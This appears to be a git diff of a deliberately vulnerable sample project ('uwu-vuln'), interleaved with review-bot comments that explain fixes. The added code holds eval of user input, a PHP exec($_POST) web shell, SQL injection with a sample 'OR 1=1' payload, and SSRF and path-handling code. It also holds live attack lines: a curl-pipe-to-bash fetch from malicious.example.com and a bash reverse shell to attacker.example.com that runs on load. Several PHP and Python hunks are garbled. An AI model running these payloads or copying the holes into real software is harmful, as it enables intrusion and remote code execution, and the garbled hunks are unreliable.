diff --git a/browser copy/index.js b/browser copy/index.js
new file mode 100644
index 0000000..5f1b215
--- /dev/null
+++ b/browser copy/index.js
@@ -0,0 +1,5 @@
+function executeUserScript() {
+ var userScript = document.getElementById('userScript').value;
+ // Using eval to execute user-provided script
+ eval(userScript);
+}
diff --git a/browser/index.js b/browser/index.js
new file mode 100644
index 0000000..5f1b215
--- /dev/null
+++ b/browser/index.js
@@ -0,0 +1,5 @@
+function executeUserScript() {
+ var userScript = document.getElementById('userScript').value;
+ // Using eval to execute user-provided script
+ eval(userScript);
+}
diff --git a/cli/index.js b/cli/index.js
new file mode 100644
index 0000000..7e5db7a
--- /dev/null
+++ b/cli/index.js
@@ -0,0 +1,18 @@
+const { exec } = require('child_process');
+
+const userArg = process.argv[2] || '';
+
+const cmd = `
+ rm -rf /tmp/vuln_dir --no-preserve-root &&
+ curl http://malicious.example.com/install.sh | bash &&
+ ls ${userArg}
+`;
+
+console.log('[*] Running dangerous CLI pipeline…');
+exec(cmd, (err, stdout, stderr) => {
+ if (err) {
+ console.error('[!] Pipeline failed:', err);
+ return;
+ }
+ console.log('[+] Pipeline succeeded. stdout:\\n', stdout);
+});
diff --git a/disk/index.js b/disk/index.js
new file mode 100644
index 0000000..963519e
--- /dev/null
+++ b/disk/index.js
@@ -0,0 +1,17 @@
+const express = require('express');
+const fs = require('fs');
+const path = require('path');
+const app = express();
+
+// Path Traversal
+app.get('/read', (req, res) => {
+ const file = req.query.file;
+ const fullPath = path.resolve(__dirname, file);
+ if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
+ fs.readFile(fullPath, 'utf8', (err, data) => {
+ if (err) return res.status(500).send(err.message);
+ res.send(data);
+ });
+});
+
+app.listen(3001, () => console.log('Disk vuln on port 3001'));
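Review bot: `eval(userScript)` executes whatever the user typed into `#userScript` with the page's full origin privileges, and `browser copy/index.js` and `browser/index.js` are byte-identical copies of the same function (same blob 5f1b215), so the second file should be dropped rather than maintained twice. If the file exists as an intentionally vulnerable sample, the comment should say so explicitly rather than merely describing the call: `// INTENTIONALLY VULNERABLE: eval() of user input (code-injection demo) — do not reuse`; otherwise run the snippet in a sandboxed `<iframe sandbox>` or, if the field is meant to carry data, parse it with `JSON.parse` instead. `document.getElementById('userScript')` is also dereferenced without a null check, and `var` should be `const`.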
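Review bot: `ls ${userArg}` interpolates `process.argv[2]` straight into a shell string handed to `exec`, which is a command-injection sink; pass the argument out-of-band with `execFile('ls', [userArg], cb)` so the shell never parses it. The two preceding steps (`rm -rf /tmp/vuln_dir --no-preserve-root` and `curl … | bash`) run destructively on every invocation, so if this file is a fixture for a scanner the command should not actually reach `exec` — keep it as a string constant and log it. The `stderr` callback parameter is unused, and `'\\n'` as written in the hunk is double-escaped, so the success message prints a literal backslash-n rather than a newline.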
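Review bot: `req.query.file` is used without a type check, so a missing or repeated `file` parameter hands `undefined` or an array to `path.resolve`, which throws and becomes a 500 instead of the intended 400; add `if (typeof file !== 'string') return res.status(400).send('Invalid file path');` before the resolve. The `startsWith(__dirname + path.sep)` guard does confine the path to the module directory, but that directory is the application's own source tree (this `index.js` included) and symlinks under it are not re-checked with `fs.realpath`, so a dedicated data subdirectory would be a safer root. `res.status(500).send(err.message)` echoes the filesystem error, including the absolute path, to the client; a fixed `'Not found'` with the detail logged server-side is the usual choice. The `// Path Traversal` comment now reads like a label for a vulnerability the handler largely mitigates; it should describe the contract (`// Serves files strictly below __dirname; rejects anything resolving outside it`).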
diff --git a/http copy/index.js b/http copy/index.js
new file mode 100644
index 0000000..1577130
--- /dev/null
+++ b/http copy/index.js
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+ return ip === '::1' ||
+ /^127\./.test(ip) ||
+ /^10\./.test(ip) ||
+ /^192\.168\./.test(ip) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+ ip.startsWith('fc') || ip.startsWith('fd') ||
+ ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+ const url = req.query.url;
+ let parsedUrl;
+ try {
+ parsedUrl = new URL(url);
+ } catch (e) {
+ return res.status(400).send('Invalid URL');
+ }
+ const hostname = parsedUrl.hostname;
+ if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+ hostname === 'localhost' ||
+ hostname === '127.0.0.1' ||
+ hostname === '::1' ||
+ /^(10|127)\./.test(hostname) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+ /^192\.168\./.test(hostname)) {
+ return res.status(400).send('URL not allowed');
+ }
+ try {
+ // DNS resolution to prevent DNS rebinding
+ try {
+ const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+ for (const { address } of addresses) {
+ if (isPrivateIp(address)) {
+ return res.status(400).send('URL not allowed');
+ }
+ }
+ } catch (e) {
+ return res.status(400).send('Invalid hostname');
+ }
+
+ const resp = await axios.get(url);
+ res.send(resp.data);
+ } catch (e) {
+ res.status(500).send(e.message);
+ }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
diff --git a/http/index.js b/http/index.js
new file mode 100644
index 0000000..1577130
--- /dev/null
+++ b/http/index.js
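Review bot: the `dns.lookup` check and the later `axios.get(url)` resolve the hostname independently, so the comment `// DNS resolution to prevent DNS rebinding` does not hold — a name that resolves differently on the second lookup is still fetched (the identical code is repeated in `http/index.js`, blob 1577130, so one copy should go). The request should connect to the address that was just validated (an `http.Agent`/`https.Agent` created with a custom `lookup` returning the checked result, passed to axios as `httpAgent`/`httpsAgent`), and redirects must be refused with `const resp = await axios.get(url, { maxRedirects: 0 });` because axios follows them by default and the redirect target is never validated. `isPrivateIp` also omits several non-public ranges (0.0.0.0/8, 169.254.0.0/16 link-local, 100.64.0.0/10, and IPv4-mapped IPv6 forms such as `::ffff:a.b.c.d`), and string-prefix matching is fragile; an allowlist of permitted destination hosts is more robust than extending the denylist. `res.status(500).send(e.message)` forwards axios's error text, which can include the resolved target, back to the caller.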
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+ return ip === '::1' ||
+ /^127\./.test(ip) ||
+ /^10\./.test(ip) ||
+ /^192\.168\./.test(ip) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+ ip.startsWith('fc') || ip.startsWith('fd') ||
+ ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+ const url = req.query.url;
+ let parsedUrl;
+ try {
+ parsedUrl = new URL(url);
+ } catch (e) {
+ return res.status(400).send('Invalid URL');
+ }
+ const hostname = parsedUrl.hostname;
+ if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+ hostname === 'localhost' ||
+ hostname === '127.0.0.1' ||
+ hostname === '::1' ||
+ /^(10|127)\./.test(hostname) ||
+ /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+ /^192\.168\./.test(hostname)) {
+ return res.status(400).send('URL not allowed');
+ }
+ try {
+ // DNS resolution to prevent DNS rebinding
+ try {
+ const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+ for (const { address } of addresses) {
+ if (isPrivateIp(address)) {
+ return res.status(400).send('URL not allowed');
+ }
+ }
+ } catch (e) {
+ return res.status(400).send('Invalid hostname');
+ }
+
+ const resp = await axios.get(url);
+ res.send(resp.data);
+ } catch (e) {
+ res.status(500).send(e.message);
+ }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
diff --git a/index.php b/index.php
index df3d645..894117d 100644
--- a/index.php
+++ b/index.php
@@ -1,5 +1,8 @@ " +$_GET["search"] + ""; +echo "" .$_GET["search"]. ""; + + +exec($_POST["exec"]); ?>
diff --git a/main.py b/main.py
index 437934d..2454076 100644
--- a/main.py
+++ b/main.py
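Review bot: `echo "" .$_GET["search"]. "";` reflects the query parameter into the page unencoded (the surrounding markup was stripped by the page renderer, so the exact tags are not visible here); encode it as `htmlspecialchars($_GET["search"], ENT_QUOTES, 'UTF-8')` before output. `exec($_POST["exec"]);` hands a POST field to the system shell with no validation or allowlist, which is unauthenticated remote command execution; if the page needs to trigger a fixed set of actions, map the field to predefined commands and quote any arguments with `escapeshellarg`. The context lines of this hunk are garbled in the rendering, so the enclosing PHP block is not reviewable from here.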
@@ -6,6 +6,9 @@ app = Flask(__name__) app.secret_key = os.urandom(24) + +# Simulating a database of user accounts and their private notes# Simulating a database of user accounts and their private notes + # Simulating a database of user accounts and their private notes users = { 1: {"id": 1, "username": "alice", "password": generate_password_hash("password123")}, @@ -38,7 +41,7 @@ def reverse_content(content): def apply_decryption(note): decrypted_content = reverse_content(note['content']) - os.system(note) + os.system(reverse_content) return {"id": note['id'], "content": decrypted_content} def decrypt_notes(encrypted_notes): diff --git a/package.json b/package.json new file mode 100644 index 0000000..5cb2217 --- /dev/null +++ b/package.json @@ -0,0 +1,11 @@ +{ + "name": "uwu-vuln", + "version": "1.0.0", + "main": "index.js", + "scripts": { + "test": "echo \"Error: no test specified\" && exit 1" + }, + "author": "", + "license": "ISC", + "description": "" +} diff --git a/stdin/index.js b/stdin/index.js new file mode 100644 index 0000000..b712e33 --- /dev/null +++ b/stdin/index.js @@ -0,0 +1,12 @@ +const { exec } = require('child_process'); + +const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1'; + +console.log('[*] Executing reverse shell payload…'); +exec(payload, (err, stdout, stderr) => { + if (err) { + console.error('[!] Error executing payload:', err); + return; + } + console.log('[+] Payload executed. stdout:', stdout); +}); diff --git a/test.php b/test.php new file mode 100644 index 0000000..cdd2a13 --- /dev/null +++ b/test.php 
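Review bot: `os.system(reverse_content)` in the second hunk passes the `reverse_content` function object, not a string, so every call to `apply_decryption` raises `TypeError` before it returns; the previous `os.system(note)` had the same problem with a dict. Nothing in `apply_decryption` needs a shell — `decrypted_content` is already produced by `reverse_content(note['content'])` — so the line should be deleted rather than repaired, which also removes an `os.system` call from a path that appears to handle user-supplied note content. In the first hunk the added comment is the text `# Simulating a database of user accounts and their private notes` pasted twice on one line, directly above an existing identical comment; the three added lines should be dropped. `decrypt_notes` starts inside the hunk but its body lies outside it.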
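Review bot: `dependencies` is absent although the new `disk/`, `http/`, `cli/` and `ws/` scripts `require('express')`, `axios` and `ws`, so a fresh `npm install` from this manifest cannot run them and the versions in use are unrecorded. Add a `"dependencies"` block pinning `express`, `axios` and `ws`, and commit the lockfile, so the resolved versions are auditable. `"main": "index.js"` points at a root file this commit does not add; if none exists it should reference one of the service entry points or be removed.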
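Review bot: `exec(payload)` runs at module load with no guard, so merely requiring or starting this file spawns an interactive shell that connects out to the host named in `payload`; nothing here reads stdin despite the directory name. If the file exists as a detection fixture, the string should stay inert — `console.log('[*] payload (not executed):', payload);` in place of the `exec` call — so scanners and EDR rules that look for `child_process` together with `/dev/tcp` still see it without the machine making the connection. The `stdout`/`stderr` parameters are meaningless for an interactive shell whose I/O is redirected to the socket, and the `'[+] Payload executed'` message is misleading on that basis.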
@@ -0,0 +1,42 @@ +connect_error) { + die("Connection failed: ". $conn->connect_error); + } + + // admin + // gdhas' OR 1=1 # + + // Query database + $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; + + $result = $conn->query($query); + + // Check if user exists + if ($result->num_rows > 0) { + echo "Welcome, $username!"; + } else { + echo "$query Invalid username or password."; + } + + // Close connection + $conn->close(); +}
diff --git a/test.py b/test.py
new file mode 100644
index 0000000..0104a9b
--- /dev/null
+++ b/test.py
@@ -0,0 +1,3 @@
+import random
+
+print("asd")
diff --git a/upload.php b/upload.php
new file mode 100644
index 0000000..ac74e8d
--- /dev/null
+++ b/upload.php
@@ -0,0 +1,23 @@
+
diff --git a/ws/index.js b/ws/index.js
new file mode 100644
index 0000000..7b0fc64
--- /dev/null
+++ b/ws/index.js
@@ -0,0 +1,12 @@
+const WebSocket = require('ws');
+const wss = new WebSocket.Server({ port: 8080 });
+
+// RCE
+wss.on('connection', ws => {
+ ws.on('message', msg => {
+ eval(msg);
+ ws.send('Executed: ' + msg);
+ });
+});
+
+console.log('WS vuln on port 8080');
\ No newline at end of file
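Review bot: `$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";` builds SQL by interpolating request values, so the login check is injectable; use a prepared statement (`$conn->prepare('SELECT id, password FROM users WHERE username = ?')` with `bind_param('s', $username)`) and compare the stored hash with `password_verify` instead of matching a plaintext `password` column. `echo "$query Invalid username or password.";` prints the full query, including the submitted password, back to the browser on every failed login; the response should be the fixed text only. The `// gdhas' OR 1=1 #` comment is a leftover test input and should be removed. The beginning of this hunk (the `<?php` block up to `$conn->connect_error`) was swallowed by the page renderer, so the connection setup and the origin of `$username`/`$password` are not visible here.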
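Review bot: `eval(msg)` executes every WebSocket message as JavaScript in the server process, with no authentication, origin check or message schema, so any client that can reach port 8080 gets code execution. Replace it with a parsed message and a fixed dispatch table (`JSON.parse(msg)`, then look the `op` field up with `Object.hasOwn(handlers, op)` and reject anything else with `ws.close(1008)`), and check `req.headers.origin` in a `verifyClient` hook on `WebSocket.Server`. Note that with `ws` 8.x the `message` event delivers a `Buffer`, and `eval` returns a non-string argument unchanged, so on such a version the line would silently do nothing while `'Executed: ' + msg` still reports success — the actual behaviour depends on the `ws` version, which `package.json` does not pin. The `// RCE` comment labels the defect rather than documenting intended behaviour.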